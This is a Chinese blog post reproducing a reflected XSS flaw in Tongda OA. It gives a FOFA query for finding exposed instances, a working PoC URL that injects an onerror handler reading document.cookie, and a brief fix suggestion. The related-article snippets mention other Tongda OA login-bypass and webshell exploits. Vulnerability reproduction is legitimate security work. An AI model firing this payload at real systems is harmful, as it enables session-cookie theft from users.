通达OA反射型xss漏洞复现

柳岸花又明

已于 2024-03-07 13:16:47 修改

阅读量1.5k

点赞数 10

分类专栏：漏洞复现文章标签： xss 前端

于 2024-02-27 10:56:54 首次发布

本文链接：https://blog.csdn.net/adzz9/article/details/136315972

版权

漏洞复现专栏收录该内容

1 篇文章

订阅专栏

1、产品简介

通达OA(0fice Anywhere网络智能办公系统)是由北京通达信Q科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等，帮助广大用户降低沟通和管理成本，提升生产和决策效率。

2、漏洞概述

通达OA 存在反射型xss漏洞，攻击者通过漏洞可以获取cookie.

3、复现环境

fofa语句：app="TDXK-通达OA"

4、漏洞复现

url：https://ip/module/html_editor/editor/plugins/td_listview/td_listview.php?GZIP_POSTFIX=%22+onerror=alert(document.cookie)+a=1

5、修复建议

对用户输入的数据进行严格的验证，包括长度、类型、格式等，不信任任何用户输入，过滤掉潜在的恶意脚本。

声明：此文章仅用于学习，利用文章做出相关违背网络安全法行为，一切与作者无关。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

柳岸花又明

关注关注

10
点赞
踩
9

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

通达OA add.html接口信息泄露漏洞复现 [附POC]

薛定谔嘚喵博客

11-27

365

通达OA（Office Anywhere网络智能办公系统）协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA add.html接口存在信息泄露漏洞，其主要原因是 /general/hr/setting/attendance/newLeave/add.html 存在未授权访问导致人员信息泄露。

万户OA jsp/view.jsp反射型XSS漏洞复现

afei001

01-10

486

万户OA是集协同软件、门户网站、ERP、CRM、HR、财务、电子邮件、视频会议的功能的一种综合性办公系统。该产品存在反射型XSS漏洞，攻击者可利用该漏洞在HTML上下文中执行JavaScript恶意代码。

1 条评论您还未登录，请先登录后发表或查看评论

通达OA11.2漏洞复现

lhix_的博客

04-02

4616

漏洞发现在线搜索通达oa漏洞，发现通达OA前台任意用户登录漏洞https://blog.csdn.net/xuandao_ahfengren/article/details/110233044，成功进入后台。寻找文件上传点菜单–》系统管理–》数据库管理–》数据库脚本导入上传文件为shell.php 内容如下： set global general_log = on; set global general_log_file =‘C://TDOA/webroot//abc.php’; select

通达OA系统11.2漏洞

qq_50854662的博客

12-02

5517

以通达OA系统11.2版本为案例的Web渗透

XSS漏洞

zhoutong2323的博客

04-19

3301

XSS漏洞（Cross-Site Scripting）是一种常见的Web应用程序安全漏洞，它允许攻击者在受害者的浏览器中注入恶意脚本。当受害者访问包含恶意脚本的网页时，攻击者就可以利用该漏洞来执行任意的代码，例如窃取用户的敏感信息、修改网页内容或进行其他恶意活动。

通达OA 前台任意用户登录漏洞复现（更新手工获取cookie过程）

thelostworld

05-12

4149

新增内容1:范围今天不是炒冷饭：主要是昨天有个兄弟看了文章后问了一下怎么手动获取cookie，相互交流了一下，觉得还是有必要发一下，这个手工获取cookie的流程。一、漏洞描述通达OA是一套办公系统。通达OA官方于4月17日发布安全更新。经分析，在该次安全更新中修复了包括任意用户登录在内的高危漏洞。攻击者通过构造恶意请求，可以直接绕过登录验证逻辑，伪装为系统管理员身份登录OA系统。二、影响版本通达OA2017、V11.X<V11.5环境搭建：自行镜像环境搭建（后台回复“tongda”获取环境和POC）

【网络安全】详解XSS漏洞及反射型XSS漏洞

yyyyyybw的博客

09-25

1475

反射型XSS漏洞是Web应用程序中常见的安全漏洞，攻击者可利用该漏洞注入恶意代码，窃取用户敏感信息、篡改页面内容、操纵页面行为等。为确保Web应用程序的安全性，应该采取必要措施对输入数据进行严格验证、转义和过滤处理。如果你也想学网络安全，做一个白帽黑客，我为你整理了一套完整的详细的教程资料，戳网络安全（黑客）自学笔记+学习路线+配套视频教程（超详细）t=N7T8。

【漏洞复现-通达OA】通达OA前台任意用户登录漏洞

xiaokp7的博客

06-18

3109

通达OA（Office Anywhere网络智能办公系统）是中国通达公司的一套协同办公自动化软件。通达OA < 11.5.200417存在一个认证绕过漏洞，利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码，成功登录系统管理员账户，继而在系统后台上传恶意文件控制网站服务器。

通达OA header身份认证绕过漏洞利用工具

12-25

通达OA header身份认证绕过漏洞利用脚本，可以检测漏洞是否存在并生成可用的cookie

通达OA任意用户登录漏洞复现

谢公子的博客

01-03

2622

通达OA 前台任意用户登录漏洞漏洞描述通达OA官方于4月17日发布安全更新。在该次安全更新中修复了包括任意用户登录在内的高危漏洞。攻击者通过构造恶意请求，可以直接绕过登录验证逻辑，伪装为系统管理身份登录OA系统。影响范围通达OA2017 (V10.x) 通达OAV11.x < 11.5.200417版本漏洞复现搭建好环境，这里环境使用的是通达OA2017版利用脚本获取cookie python3 tongda-oA.py -v 2017 -ur.

通达OA2017最新版无限制无替换导入文件tdkey10

08-23

通达OA2017最新版tdkey10文件，直接导入，无需替换。

通达OA前台伪造管理登陆cookie生成tongda.py

05-07

通达OA 前台伪造管理员登陆漏洞的cookie生成脚本，可以用以生成PHPsessionid,然后替换cookie，从而登陆通达OA后台。

【新】通达OA前台反序列化漏洞分析

C20220511的博客

08-07

2360

通达OA作为历史上出现漏洞较多的OA，在经过多轮的迭代之后已经很少前台的RCE漏洞了。对应12系列未做过多测试，本文提到的所有漏洞在最新版的通达12.4中已修复，使用此漏洞造成的任何攻击影响均与本文作者无关。在上面的方法中会对传入的Cookie值进行签名校验，校验的方法是validateData，其中$this->cookieValidationKey是签名的key。继续跟踪loadCookies方法，在这个方法中会调用unserialize方法对传入的Cookie的值进行反序列化。

漏洞实例_通达OA远程命令执行漏洞分析_零基础黑客入门教程